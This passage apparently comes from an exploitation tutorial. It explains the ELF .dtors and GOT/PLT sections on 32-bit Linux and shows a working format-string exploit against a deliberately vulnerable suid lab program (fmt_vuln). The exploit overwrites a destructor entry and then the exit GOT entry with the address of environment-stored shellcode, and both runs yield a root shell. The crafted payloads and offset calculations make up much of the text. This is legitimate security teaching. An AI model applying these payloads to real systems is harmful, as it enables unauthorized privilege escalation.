This behavior of automatically executing a function on exit is controlled by the .dtors table section of the binary. This section is an array of 32-bit addresses terminated by a null address. The array always begins with 0xffffffff and ends with the null address of 0x00000000. Between these two are the addresses of all the functions that have been declared with the destructor attribute.
The nm command can be used to find the address of the cleanup function, and objdump can be used to examine the sections of the binary.
$ nm ./dtors_sample
080494d0 D _DYNAMIC
080495b0 D _GLOBAL_OFFSET_TABLE_
08048404 R _IO_stdin_used
         w _Jv_RegisterClasses
0804959c d __CTOR_END__
08049598 d __CTOR_LIST__
080495a8 d __DTOR_END__
080495a0 d __DTOR_LIST__
080494cc d __EH_FRAME_BEGIN__
080494cc d __FRAME_END__
080495ac d __JCR_END__
080495ac d __JCR_LIST__
080495cc A __bss_start
080494c0 D __data_start
080483b0 t __do_global_ctors_aux
08048300 t __do_global_dtors_aux
080494c4 d __dso_handle
         w __gmon_start__
         U __libc_start_main@@GLIBC_2.0
080495cc A _edata
080495d0 A _end
080483e0 T _fini
08048400 R _fp_hw
08048254 T _init
080482b0 T _start
080482d4 t call_gmon_start
0804839c t cleanup
080495cc b completed.1
080494c0 W data_start
         U exit@@GLIBC_2.0
08048340 t frame_dummy
08048368 T main
080494c8 d p.0
         U printf@@GLIBC_2.0
$ objdump -s -j .dtors ./dtors_sample
./dtors_sample:     file format elf32-i386
Contents of section .dtors:
 80495a0 ffffffff 9c830408 00000000           ............
$
The nm command shows that the cleanup function is located at 0x0804839c. It also reveals that the .dtors section starts at 0x080495a0 with __DTOR_LIST__ and ends at 0x080495a8 with __DTOR_END__. This means that 0x080495a0 should contain 0xffffffff, 0x080495a8 should contain 0x00000000, and the address between them, 0x080495a4, should contain the address of the cleanup function, 0x0804839c.
The objdump command shows the actual contents of the .dtors section, although in a slightly confusing format. The first value, 80495a0, is simply the address where the .dtors section is located. After that, the raw bytes are shown in memory order rather than as 32-bit values, so on this little-endian x86 system each address appears byte-reversed: 9c830408 is the address 0x0804839c. Bearing this in mind, everything appears correct.
An interesting detail about the .dtors section is that it's a writable section. An object dump of the headers will verify this by showing that the .dtors section isn't labeled READONLY.
$ objdump -h ./dtors_sample
./dtors_sample:     file format elf32-i386
Sections:
Idx Name           Size      VMA       LMA       File off  Algn
  0 .interp        00000013  080480f4  080480f4  000000f4  2**0
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag  00000020  08048108  08048108  00000108  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .hash          0000002c  08048128  08048128  00000128  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynsym        00000060  08048154  08048154  00000154  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynstr        00000051  080481b4  080481b4  000001b4  2**0
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .gnu.version   0000000c  08048206  08048206  00000206  2**1
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version_r 00000020  08048214  08048214  00000214  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .rel.dyn       00000008  08048234  08048234  00000234  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .rel.plt       00000018  0804823c  0804823c  0000023c  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .init          00000018  08048254  08048254  00000254  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .plt           00000040  0804826c  0804826c  0000026c  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text          00000130  080482b0  080482b0  000002b0  2**4
                   CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini          0000001c  080483e0  080483e0  000003e0  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata        000000c0  08048400  08048400  00000400  2**5
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .data          0000000c  080494c0  080494c0  000004c0  2**2
                   CONTENTS, ALLOC, LOAD, DATA
 15 .eh_frame      00000004  080494cc  080494cc  000004cc  2**2
                   CONTENTS, ALLOC, LOAD, DATA
 16 .dynamic       000000c8  080494d0  080494d0  000004d0  2**2
                   CONTENTS, ALLOC, LOAD, DATA
 17 .ctors         00000008  08049598  08049598  00000598  2**2
                   CONTENTS, ALLOC, LOAD, DATA
 18 .dtors         0000000c  080495a0  080495a0  000005a0  2**2
                   CONTENTS, ALLOC, LOAD, DATA
 19 .jcr           00000004  080495ac  080495ac  000005ac  2**2
                   CONTENTS, ALLOC, LOAD, DATA
 20 .got           0000001c  080495b0  080495b0  000005b0  2**2
                   CONTENTS, ALLOC, LOAD, DATA
 21 .bss           00000004  080495cc  080495cc  000005cc  2**2
                   ALLOC
 22 .comment       00000060  00000000  00000000  000005cc  2**0
                   CONTENTS, READONLY
 23 .debug_aranges 00000058  00000000  00000000  00000630  2**3
                   CONTENTS, READONLY, DEBUGGING
 24 .debug_info    000000b4  00000000  00000000  00000688  2**0
                   CONTENTS, READONLY, DEBUGGING
 25 .debug_abbrev  0000001c  00000000  00000000  0000073c  2**0
                   CONTENTS, READONLY, DEBUGGING
 26 .debug_line    000000ff  00000000  00000000  00000758  2**0
                   CONTENTS, READONLY, DEBUGGING
$
Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format-string program, fmt_vuln, must have a .dtors section containing nothing. This can be inspected using nm and objdump.
$ nm ./fmt_vuln | grep DTOR
0804964c d __DTOR_END__
08049648 d __DTOR_LIST__
$ objdump -s -j .dtors ./fmt_vuln
./fmt_vuln:     file format elf32-i386
Contents of section .dtors:
 8049648 ffffffff 00000000                    ........
$
As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is only 4 bytes this time, which means there are no addresses between them. The object dump verifies this.
Because the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. The location to overwrite is the address of __DTOR_LIST__ plus 4, which is 0x0804964c (this also happens to be the address of __DTOR_END__ in this case, because the list is empty).
If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.
$ export SHELLCODE=`cat shellcode`
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffd90
$ pcalc 0x90 + 4
148             0x94            0y10010100
$
Shellcode can be put into an environment variable, and the address can be predicted as usual. The name of the helper program getenvaddr is 2 bytes longer than the name of the vulnerable fmt_vuln program, and in this setup that difference shifts the environment by 4 bytes (the 0x90 + 4 computed above), so the shellcode will be located at 0xbffffd94 when fmt_vuln is executed. This address simply has to be written into the .dtors section at 0x0804964c using the format-string vulnerability. The test_val variable is used first, for clarity's sake, but all the necessary calculations can be done in advance.
$ pcalc 0x94 - 16
132             0x84            0y10000100
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n
The right way:
%3$132x%4$n
The wrong way:
3e8
[*] test_val @ 0x08049570 = 148 0x00000094
$ pcalc 0xfd - 0x94
105             0x69            0y1101001
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n
The right way:
%3$132x%4$n%3$105x%5$n
The wrong way:
3e8 3e8
[*] test_val @ 0x08049570 = 64916 0x0000fd94
$ pcalc 0xff - 0xfd
2               0x2             0y10
$ pcalc 0x1ff - 0xfd
258             0x102           0y100000010
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n
The wrong way:
3e8 3e8 3e8
[*] test_val @ 0x08049570 = 33553812 0x01fffd94
$ pcalc 0xbf - 0xff
-64             0xffffffc0      0y11111111111111111111111111000000
$ pcalc 0x1bf - 0xff
192             0xc0            0y11000000
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:
3e8 3e8 3e8 3e8
[*] test_val @ 0x08049570 = -1073742444 0xbffffd94
$
Now the first four addresses in the beginning of the format string just need to be changed to 0x0804964c, 0x0804964d, 0x0804964e, and 0x0804964f, in order to write the 0xbffffd94 address to the .dtors section, instead of to test_val.
$ ./fmt_vuln `printf "\x4c\x96\x04\x08\x4d\x96\x04\x08\x4e\x96\x04\x08\x4f\x96\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:
3e8 3e8 3e8 3e8
[*] test_val @ 0x08049570 = -72 0xffffffb8
sh-2.05a# whoami
root
sh-2.05a#
Even though the .dtors section isn't properly terminated with a null address of 0x00000000, the shellcode address is still considered to be a destructor function, and it will be called when the program is exited, providing a root shell.
Because a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose — the procedure linkage table, or PLT for short. This section consists of many jump instructions, each one corresponding to the address of a function. It works sort of like a springboard. Each time a shared function needs to be called, control will pass through the procedure linkage table.
An object dump disassembling the PLT section in the vulnerable format-string program (fmt_vuln) shows these jump instructions:
$ objdump -d -j .plt ./fmt_vuln
./fmt_vuln:     file format elf32-i386
Disassembly of section .plt:
08048290 <.plt>:
 8048290:  ff 35 58 96 04 08    pushl  0x8049658
 8048296:  ff 25 5c 96 04 08    jmp    *0x804965c
 804829c:  00 00                add    %al,(%eax)
 804829e:  00 00                add    %al,(%eax)
 80482a0:  ff 25 60 96 04 08    jmp    *0x8049660
 80482a6:  68 00 00 00 00       push   $0x0
 80482ab:  e9 e0 ff ff ff       jmp    8048290 <_init+0x18>
 80482b0:  ff 25 64 96 04 08    jmp    *0x8049664
 80482b6:  68 08 00 00 00       push   $0x8
 80482bb:  e9 d0 ff ff ff       jmp    8048290 <_init+0x18>
 80482c0:  ff 25 68 96 04 08    jmp    *0x8049668
 80482c6:  68 10 00 00 00       push   $0x10
 80482cb:  e9 c0 ff ff ff       jmp    8048290 <_init+0x18>
 80482d0:  ff 25 6c 96 04 08    jmp    *0x804966c
 80482d6:  68 18 00 00 00       push   $0x18
 80482db:  e9 b0 ff ff ff       jmp    8048290 <_init+0x18>
$
One of these jump instructions is associated with the exit function, which is called at the end of the program. If the jump instruction used for the exit function can be manipulated to direct the execution flow into shellcode instead of the exit function, a root shell will be spawned. Next, the PLT section is examined in a bit more detail.
$ objdump -h ./fmt_vuln | grep -A 1 .plt
  8 .rel.plt      00000020  08048258  08048258  00000258  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
--
 10 .plt          00000050  08048290  08048290  00000290  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
$
As this output shows, the procedure linkage table is unfortunately read-only. But closer examination of the jump instructions reveals that they aren't jumping to fixed addresses, but through pointers to addresses. This means that the actual locations of all the functions are stored at the memory addresses 0x08049660, 0x08049664, 0x08049668, and 0x0804966c.
These memory addresses lie in another special section, called the global offset table (GOT). One very interesting detail about the global offset table is that it isn't marked as read-only, as the following output shows.
$ objdump -h ./fmt_vuln | grep -A 1 .got
 20 .got          00000020  08049654  08049654  00000654  2**2
                  CONTENTS, ALLOC, LOAD, DATA
$ objdump -d -j .got ./fmt_vuln
./fmt_vuln:     file format elf32-i386
Disassembly of section .got:
08049654 <_GLOBAL_OFFSET_TABLE_>:
 8049654:  78 95 04 08 00 00 00 00 00 00 00 00 a6 82 04 08  x...............
 8049664:  b6 82 04 08 c6 82 04 08 d6 82 04 08 00 00 00 00  ................
$
This shows that the jump instruction jmp *0x08049660 in the procedure linkage table actually jumps the program execution to 0x080482a6, because 0x080482a6 is located at 0x08049660 in the global offset table. The subsequent jump instructions (jmp *0x08049664, jmp *0x08049668, and jmp *0x0804966c) actually jump to 0x080482b6, 0x080482c6, and 0x080482d6, respectively. Because the global offset table can be written to, if one of these addresses is overwritten, the execution flow of the program can be controlled through the procedure linkage table, despite the lack of write access.
The necessary information, including which function each of these entries belongs to, can be obtained by displaying the dynamic relocation entries for the binary by using objdump.
$ objdump -R ./fmt_vuln
./fmt_vuln:     file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049670 R_386_GLOB_DAT    __gmon_start__
08049660 R_386_JUMP_SLOT   __libc_start_main
08049664 R_386_JUMP_SLOT   printf
08049668 R_386_JUMP_SLOT   exit
0804966c R_386_JUMP_SLOT   strcpy
$
This reveals that the address of the exit function is located in the global offset table at 0x08049668. If this location is overwritten with the address of the shellcode, the program should call the shellcode when it thinks it's calling the exit function.
As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format-string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before, meaning that the only thing that needs adjustment is the first 16 bytes of the format string. The calculations for the %x format parameters will be done once again for clarity.
$ export SHELLCODE=`cat shellcode`
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffd90
$ pcalc 0x90 + 4
148             0x94            0y10010100
$ pcalc 0x94 - 16
132             0x84            0y10000100
$ pcalc 0xfd - 0x94
105             0x69            0y1101001
$ pcalc 0x1ff - 0xfd
258             0x102           0y100000010
$ pcalc 0x1bf - 0xff
192             0xc0            0y11000000
$ ./fmt_vuln `printf "\x68\x96\x04\x08\x69\x96\x04\x08\x6a\x96\x04\x08\x6b\x96\x04\x08"`%3\$132x%4\$n%3\$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:
3e8 3e8 3e8 3e8
[*] test_val @ 0x08049570 = -72 0xffffffb8
sh-2.05a# whoami
root
sh-2.05a#
When fmt_vuln tries to call the exit function, the address of the exit function is looked up in the global offset table and is jumped to via the procedure linkage table. Because the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.
Another advantage of overwriting the global offset table is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.
The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.